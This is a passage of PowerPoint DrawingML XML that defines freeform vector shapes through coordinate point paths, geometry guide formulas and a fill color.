                    <a:lnTo>
                      <a:pt x="321" y="973"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="968"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="281" y="965"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="264" y="963"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="960"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="235" y="958"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="225" y="958"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="218" y="958"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="211" y="952"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="945"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="939"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="187" y="932"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="925"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="920"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="916"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="162" y="913"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="905"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="134" y="887"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="860"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="829"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="798"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="24" y="768"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="744"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="729"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="697"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="8" y="660"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="629"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="611"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="603"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="568"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67" y="547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="528"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="105" y="496"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="490"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="114" y="488"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="129" y="482"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="136" y="480"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="477"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="453"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="196" y="443"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="208" y="435"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="219" y="429"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="223" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="422"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="406"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="396"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="327" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="351" y="375"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="369" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="375" y="365"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="359"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="350"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="339"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="407" y="332"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="409" y="314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="278"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="418" y="242"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="219"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="189"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="446" y="84"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="450" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="455" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="468" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="474" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="483" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="495" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="13"/>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67" name="Freeform 38"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="413" y="2414"/>
                <a:ext cx="161" cy="49"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 491"/>
                  <a:gd name="T1" fmla="*/ 0 h 151"/>
                  <a:gd name="T2" fmla="*/ 0 w 491"/>
                  <a:gd name="T3" fmla="*/ 0 h 151"/>
                  <a:gd name="T4" fmla="*/ 0 w 491"/>
                  <a:gd name="T5" fmla="*/ 0 h 151"/>
                  <a:gd name="T6" fmla="*/ 0 w 491"/>
                  <a:gd name="T7" fmla="*/ 0 h 151"/>
                  <a:gd name="T8" fmla="*/ 0 w 491"/>
                  <a:gd name="T9" fmla="*/ 0 h 151"/>
                  <a:gd name="T10" fmla="*/ 0 w 491"/>
                  <a:gd name="T11" fmla="*/ 0 h 151"/>
                  <a:gd name="T12" fmla="*/ 0 w 491"/>
                  <a:gd name="T13" fmla="*/ 0 h 151"/>
                  <a:gd name="T14" fmla="*/ 0 w 491"/>
                  <a:gd name="T15" fmla="*/ 0 h 151"/>
                  <a:gd name="T16" fmla="*/ 0 w 491"/>
                  <a:gd name="T17" fmla="*/ 0 h 151"/>
                  <a:gd name="T18" fmla="*/ 0 w 491"/>
                  <a:gd name="T19" fmla="*/ 0 h 151"/>
                  <a:gd name="T20" fmla="*/ 0 w 491"/>
                  <a:gd name="T21" fmla="*/ 0 h 151"/>
                  <a:gd name="T22" fmla="*/ 0 w 491"/>
                  <a:gd name="T23" fmla="*/ 0 h 151"/>
                  <a:gd name="T24" fmla="*/ 0 w 491"/>
                  <a:gd name="T25" fmla="*/ 0 h 151"/>
                  <a:gd name="T26" fmla="*/ 0 w 491"/>
                  <a:gd name="T27" fmla="*/ 0 h 151"/>
                  <a:gd name="T28" fmla="*/ 0 w 491"/>
                  <a:gd name="T29" fmla="*/ 0 h 151"/>
                  <a:gd name="T30" fmla="*/ 0 w 491"/>
                  <a:gd name="T31" fmla="*/ 0 h 151"/>
                  <a:gd name="T32" fmla="*/ 0 w 491"/>
                  <a:gd name="T33" fmla="*/ 0 h 151"/>
                  <a:gd name="T34" fmla="*/ 0 w 491"/>
                  <a:gd name="T35" fmla="*/ 0 h 151"/>
                  <a:gd name="T36" fmla="*/ 0 w 491"/>
                  <a:gd name="T37" fmla="*/ 0 h 151"/>
                  <a:gd name="T38" fmla="*/ 0 w 491"/>
                  <a:gd name="T39" fmla="*/ 0 h 151"/>
                  <a:gd name="T40" fmla="*/ 0 w 491"/>
                  <a:gd name="T41" fmla="*/ 0 h 151"/>
                  <a:gd name="T42" fmla="*/ 0 w 491"/>
                  <a:gd name="T43" fmla="*/ 0 h 151"/>
                  <a:gd name="T44" fmla="*/ 0 w 491"/>
                  <a:gd name="T45" fmla="*/ 0 h 151"/>
                  <a:gd name="T46" fmla="*/ 0 w 491"/>
                  <a:gd name="T47" fmla="*/ 0 h 151"/>
                  <a:gd name="T48" fmla="*/ 0 w 491"/>
                  <a:gd name="T49" fmla="*/ 0 h 151"/>
                  <a:gd name="T50" fmla="*/ 0 w 491"/>
                  <a:gd name="T51" fmla="*/ 0 h 151"/>
                  <a:gd name="T52" fmla="*/ 0 w 491"/>
                  <a:gd name="T53" fmla="*/ 0 h 151"/>
                  <a:gd name="T54" fmla="*/ 0 w 491"/>
                  <a:gd name="T55" fmla="*/ 0 h 151"/>
                  <a:gd name="T56" fmla="*/ 0 w 491"/>
                  <a:gd name="T57" fmla="*/ 0 h 151"/>
                  <a:gd name="T58" fmla="*/ 0 w 491"/>
                  <a:gd name="T59" fmla="*/ 0 h 151"/>
                  <a:gd name="T60" fmla="*/ 0 w 491"/>
                  <a:gd name="T61" fmla="*/ 0 h 151"/>
                  <a:gd name="T62" fmla="*/ 0 w 491"/>
                  <a:gd name="T63" fmla="*/ 0 h 151"/>
                  <a:gd name="T64" fmla="*/ 0 w 491"/>
                  <a:gd name="T65" fmla="*/ 0 h 151"/>
                  <a:gd name="T66" fmla="*/ 0 w 491"/>
                  <a:gd name="T67" fmla="*/ 0 h 151"/>
                  <a:gd name="T68" fmla="*/ 0 w 491"/>
                  <a:gd name="T69" fmla="*/ 0 h 151"/>
                  <a:gd name="T70" fmla="*/ 0 w 491"/>
                  <a:gd name="T71" fmla="*/ 0 h 151"/>
                  <a:gd name="T72" fmla="*/ 0 w 491"/>
                  <a:gd name="T73" fmla="*/ 0 h 151"/>
                  <a:gd name="T74" fmla="*/ 0 w 491"/>
                  <a:gd name="T75" fmla="*/ 0 h 151"/>
                  <a:gd name="T76" fmla="*/ 0 w 491"/>
                  <a:gd name="T77" fmla="*/ 0 h 151"/>
                  <a:gd name="T78" fmla="*/ 0 w 491"/>
                  <a:gd name="T79" fmla="*/ 0 h 151"/>
                  <a:gd name="T80" fmla="*/ 0 w 491"/>
                  <a:gd name="T81" fmla="*/ 0 h 151"/>
                  <a:gd name="T82" fmla="*/ 0 w 491"/>
                  <a:gd name="T83" fmla="*/ 0 h 151"/>
                  <a:gd name="T84" fmla="*/ 0 w 491"/>
                  <a:gd name="T85" fmla="*/ 0 h 151"/>
                  <a:gd name="T86" fmla="*/ 0 w 491"/>
                  <a:gd name="T87" fmla="*/ 0 h 151"/>
                  <a:gd name="T88" fmla="*/ 0 w 491"/>
                  <a:gd name="T89" fmla="*/ 0 h 151"/>
                  <a:gd name="T90" fmla="*/ 0 w 491"/>
                  <a:gd name="T91" fmla="*/ 0 h 151"/>
                  <a:gd name="T92" fmla="*/ 0 w 491"/>
                  <a:gd name="T93" fmla="*/ 0 h 151"/>
                  <a:gd name="T94" fmla="*/ 0 w 491"/>
                  <a:gd name="T95" fmla="*/ 0 h 151"/>
                  <a:gd name="T96" fmla="*/ 0 w 491"/>
                  <a:gd name="T97" fmla="*/ 0 h 151"/>
                  <a:gd name="T98" fmla="*/ 0 w 491"/>
                  <a:gd name="T99" fmla="*/ 0 h 151"/>
                  <a:gd name="T100" fmla="*/ 0 w 491"/>
                  <a:gd name="T101" fmla="*/ 0 h 151"/>
                  <a:gd name="T102" fmla="*/ 0 w 491"/>
                  <a:gd name="T103" fmla="*/ 0 h 151"/>
                  <a:gd name="T104" fmla="*/ 0 w 491"/>
                  <a:gd name="T105" fmla="*/ 0 h 151"/>
                  <a:gd name="T106" fmla="*/ 0 w 491"/>
                  <a:gd name="T107" fmla="*/ 0 h 151"/>
                  <a:gd name="T108" fmla="*/ 0 w 491"/>
                  <a:gd name="T109" fmla="*/ 0 h 1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151"/>
                  <a:gd name="T167" fmla="*/ 491 w 491"/>
                  <a:gd name="T168" fmla="*/ 151 h 1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151">
                    <a:moveTo>
                      <a:pt x="158" y="18"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="164" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="178" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="200" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="224" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="248" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="270" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="287" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="337" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="346" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="372" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="392" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="394" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="443" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="459" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="474" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="485" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="491" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="491" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="491" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="489" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="484" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="480" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="474" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="466" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="458" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="450" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="443" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="438" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="437" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="442" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="452" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="466" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="461" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="455" y="54"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="447" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="440" y="56"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="433" y="57"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="422" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="419" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="406" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="69"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="398" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="402" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="413" y="77"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="423" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="427" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="424" y="86"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="421" y="93"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="416" y="101"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="404" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="397" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="390" y="116"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="355" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="340" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="324" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="311" y="137"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="301" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="295" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="133"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="293" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="292" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="290" y="124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="288" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="286" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="283" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="280" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="278" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="277" y="139"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="276" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="262" y="145"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="249" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="238" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="227" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="217" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="210" y="150"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="203" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="199" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="193" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="151"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="159" y="149"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="148"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="135" y="146"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="113" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="112" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="109" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="104" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="101" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="114"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="130"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="125"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="117"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="109"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="105"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="81"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="96" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="88" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="49"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="93" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="98" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="108" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="116" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="138" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="143" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="149" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="154" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="157" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="18"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="CC0A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68" name="Freeform 39"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="418" y="2417"/>
                <a:ext cx="61" cy="41"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 189"/>
                  <a:gd name="T1" fmla="*/ 0 h 125"/>
                  <a:gd name="T2" fmla="*/ 0 w 189"/>
                  <a:gd name="T3" fmla="*/ 0 h 125"/>
                  <a:gd name="T4" fmla="*/ 0 w 189"/>
                  <a:gd name="T5" fmla="*/ 0 h 125"/>
                  <a:gd name="T6" fmla="*/ 0 w 189"/>
                  <a:gd name="T7" fmla="*/ 0 h 125"/>
                  <a:gd name="T8" fmla="*/ 0 w 189"/>
                  <a:gd name="T9" fmla="*/ 0 h 125"/>
                  <a:gd name="T10" fmla="*/ 0 w 189"/>
                  <a:gd name="T11" fmla="*/ 0 h 125"/>
                  <a:gd name="T12" fmla="*/ 0 w 189"/>
                  <a:gd name="T13" fmla="*/ 0 h 125"/>
                  <a:gd name="T14" fmla="*/ 0 w 189"/>
                  <a:gd name="T15" fmla="*/ 0 h 125"/>
                  <a:gd name="T16" fmla="*/ 0 w 189"/>
                  <a:gd name="T17" fmla="*/ 0 h 125"/>
                  <a:gd name="T18" fmla="*/ 0 w 189"/>
                  <a:gd name="T19" fmla="*/ 0 h 125"/>
                  <a:gd name="T20" fmla="*/ 0 w 189"/>
                  <a:gd name="T21" fmla="*/ 0 h 125"/>
                  <a:gd name="T22" fmla="*/ 0 w 189"/>
                  <a:gd name="T23" fmla="*/ 0 h 125"/>
                  <a:gd name="T24" fmla="*/ 0 w 189"/>
                  <a:gd name="T25" fmla="*/ 0 h 125"/>
                  <a:gd name="T26" fmla="*/ 0 w 189"/>
                  <a:gd name="T27" fmla="*/ 0 h 125"/>
                  <a:gd name="T28" fmla="*/ 0 w 189"/>
                  <a:gd name="T29" fmla="*/ 0 h 125"/>
                  <a:gd name="T30" fmla="*/ 0 w 189"/>
                  <a:gd name="T31" fmla="*/ 0 h 125"/>
                  <a:gd name="T32" fmla="*/ 0 w 189"/>
                  <a:gd name="T33" fmla="*/ 0 h 125"/>
                  <a:gd name="T34" fmla="*/ 0 w 189"/>
                  <a:gd name="T35" fmla="*/ 0 h 125"/>
                  <a:gd name="T36" fmla="*/ 0 w 189"/>
                  <a:gd name="T37" fmla="*/ 0 h 125"/>
                  <a:gd name="T38" fmla="*/ 0 w 189"/>
                  <a:gd name="T39" fmla="*/ 0 h 125"/>
                  <a:gd name="T40" fmla="*/ 0 w 189"/>
                  <a:gd name="T41" fmla="*/ 0 h 125"/>
                  <a:gd name="T42" fmla="*/ 0 w 189"/>
                  <a:gd name="T43" fmla="*/ 0 h 125"/>
                  <a:gd name="T44" fmla="*/ 0 w 189"/>
                  <a:gd name="T45" fmla="*/ 0 h 125"/>
                  <a:gd name="T46" fmla="*/ 0 w 189"/>
                  <a:gd name="T47" fmla="*/ 0 h 125"/>
                  <a:gd name="T48" fmla="*/ 0 w 189"/>
                  <a:gd name="T49" fmla="*/ 0 h 125"/>
                  <a:gd name="T50" fmla="*/ 0 w 189"/>
                  <a:gd name="T51" fmla="*/ 0 h 125"/>
                  <a:gd name="T52" fmla="*/ 0 w 189"/>
                  <a:gd name="T53" fmla="*/ 0 h 125"/>
                  <a:gd name="T54" fmla="*/ 0 w 189"/>
                  <a:gd name="T55" fmla="*/ 0 h 125"/>
                  <a:gd name="T56" fmla="*/ 0 w 189"/>
                  <a:gd name="T57" fmla="*/ 0 h 125"/>
